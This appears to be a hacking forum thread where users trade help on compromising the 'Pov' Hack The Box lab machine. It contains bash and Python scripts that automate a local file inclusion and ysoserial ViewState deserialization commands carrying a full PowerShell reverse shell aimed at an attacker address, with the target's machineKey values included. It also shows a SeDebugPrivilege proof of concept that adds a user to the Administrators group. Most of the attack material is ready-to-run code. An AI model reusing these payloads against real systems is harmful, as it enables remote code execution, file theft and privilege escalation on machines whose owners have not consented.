Posts: 9
Threads: 0
Joined: Jan 2024
(Jan 28, 2024, 09:09 AM)eclipse Wrote: (Jan 28, 2024, 09:06 AM)wardensec Wrote: (Jan 28, 2024, 08:51 AM)eclipse Wrote: how to make use of SeDebugPrivilegePoC.exe
I change CreateProcess's CmdLine into @"C:\Users\alaading\Downloads\rshell.exe" created by msfvenom windows revshell.
but:
[*]Sending stage (200774 bytes) to 10.10.11.251
[*]10.10.11.251 - Meterpreter session 9 closed. Reason: Died
[-] Meterpreter session 9 is not valid and will be closed
Any hint ???
Just add the user to the Administrators group. How did you compile the PoC?
status = CreateProcess(
null,
@"C:\Windows\System32\cmd.exe /c net localgroup administrators alaading /add",
IntPtr.Zero,
IntPtr.Zero,
false,
ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | ProcessCreationFlags.CREATE_NEW_CONSOLE,
IntPtr.Zero,
Environment.CurrentDirectory,
ref si,
out PROCESS_INFORMATION pi);
And ctrl+shift+B to compile it in VS.
Weird, it's giving me an error saying there needs to be a ')' and ';' after "out PROCESS_INFORMATION pi" but it has both just like yours
Posts: 312
Threads: 7
Joined: Oct 2023
(Jan 28, 2024, 04:18 AM)Cmbrlnd Wrote: (Jan 28, 2024, 12:31 AM)Art10n Wrote: I am stuck in the ysoserial exe , I don’t know how to run it in parrotOS.
Me too hahaha, can't get it working in Linux
Finally, I used Windows ... but I had to disable the AV
Posts: 16
Threads: 0
Joined: Jan 2024
after i delivered runas exe to the machine its not working, can anyone suggest why?
Posts: 16
Threads: 0
Joined: Jan 2024
Jan 28, 2024, 11:13 AM
(This post was last modified: Jan 28, 2024, 11:16 AM by U2t5d2lu.)
(Jan 28, 2024, 10:33 AM)U2t5d2lu Wrote: after i delivered runas exe to the machine its not working, can anyone suggest why?
RunasCs.exe i got credentials and trying to get shell as allading
I just noticed somone else upload other RunasCs.exe which works and mine is not working for some reason
Posts: 16
Threads: 0
Joined: Jan 2024
RunasCsException: CreateProcessWithLogonW logon type 2
when trying to get reverseshell with runascs.exe, how i can get revershell by other user?
Posts: 2
Threads: 0
Joined: Jan 2024
(Jan 28, 2024, 01:47 AM)scizko1 Wrote: I'm also stuck with the payload...
.\ysoserial.exe --generator="8E0F0FA3" -p ViewState -g TextFormattingRunProperties -c "New-Object System.Net.Sockets.TCPClient('10.10.x.x',9998);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
In anyone able to help me on this one? What is wrong here? 
Posts: 28
Threads: 1
Joined: Jan 2024
Seems Like I'm so late to hit the party but I'm Here
Posts: 14
Threads: 0
Joined: Aug 2023
(Jan 27, 2024, 08:41 PM)DataNinja Wrote: to automate the lfi
#!/bin/bash
lfi() {
local path="$1"
local url="http://dev.pov.htb/portfolio/"
local data="__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=oZdOFgVMnMUK%2FYsKb5EIbu8K5FHpcUxxiZo4DRwjqKXyaBZlr5C2B1qTDis2i3ay5jRdEkHIpxK%2FDtizrUyeFYsgG2I%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=q9%2BtrU8Llel1HIV8dNCMQjWweRAVxWvJLVMAhov2wealiJz5v86vse9faPve%2B2Ujm%2BGxnHiSCVy56Gzrmw%2BEzjrEGa%2BQ6qlezJahDpD%2BDppQ%2BivmcgEiaonMs2JLzDyETmEABw%3D%3D&file=$path"
#echo -e $data
if response=$(curl -s -k -X POST --data-binary "$data" "$url"); then
if [ "$(echo "$response" | grep -c "Error 404: Not Found")" -eq 0 ]; then
echo -e "\e[32m$response\e[0m"
else
echo -e "\e[31m$path not found.\e[0m"
fi
else
echo -e "\e[31mLFI Error : $(curl -s "$url" --data-urlencode "$params" -o /dev/null -w '%{http_code}')\e[0m"
fi
}
main() {
while true; do
read -r -p $'\e[34m[+] file >> \e[0m' path
lfi "$path"
done
}
if [ "${BASH_SOURCE[0]}" == "${0}" ]; then
main
fi
With a python script
import requests
headers = {"Content-Type": "application/x-www-form-urlencoded", "Accept": "*/*"}
def lfi_exploit(file_name):
data = f"__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=pysPH3epTp1d3dPCs3yCdepk7nN6lZ7LEKVBjC4xY6xP774yBT8JLxXqt7gsi0tteP9iyC2BTidHx0bAXqvDY4KCIq8%3D&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=1ZkrStfRtU5JGGv7t3tyirX6UVwHb6NuihItoMCodMNGABU3Xq4%2F58Zp%2BhWVWl%2F3esCjt1LZq5rglp164aTEcUwCmPDm8DInXc0OoeScUyKrnEh9eFLmvKtTtYhQBLEddzn9eA%3D%3D&file={file_name}"
req = requests.post('http://dev.pov.htb/portfolio/', headers=headers, data=data)
if req.status_code == 200:
print(req.text)
else:
print("Nothing Returned")
if __name__ == '__main__':
while True:
file = input("Enter File To Read : ")
lfi_exploit(file)
Posts: 2
Threads: 0
Joined: Jan 2024
Thanks for the hints! Ended up getting root after your reply
Posts: 60
Threads: 1
Joined: Jan 2024
nope, still not working, tried absolutely everything, it's just some god out there that simply refuse to let me pwn this, I tried absolutely everything and I made sure it was right, character by character, new vms, other encodings, other versions of ysoserial, other payloads, other revshells, bought a writeup, it's just simply refusing and that's it, and this fucked up machine has only port 80 open so I can't somehow skip this shit, I'm just done man
[/quote]
------------------------------------------------------------------------------------
Just start a nc listenner (nc -lvnp 9000)
Use this command to generate the payload: ./ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "powershell.exe -c \"\$client = New-Object System.Net.Sockets.TCPClient('Your_address_here', 9000); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length); \$stream.Flush()}; \$client.Close()\"" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"
And now copy the payload, do the burpsuite request for the download Cv, and copy the payload to the ''Viewstate='' field. Foward the request and you will get a reverse shell. This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
|
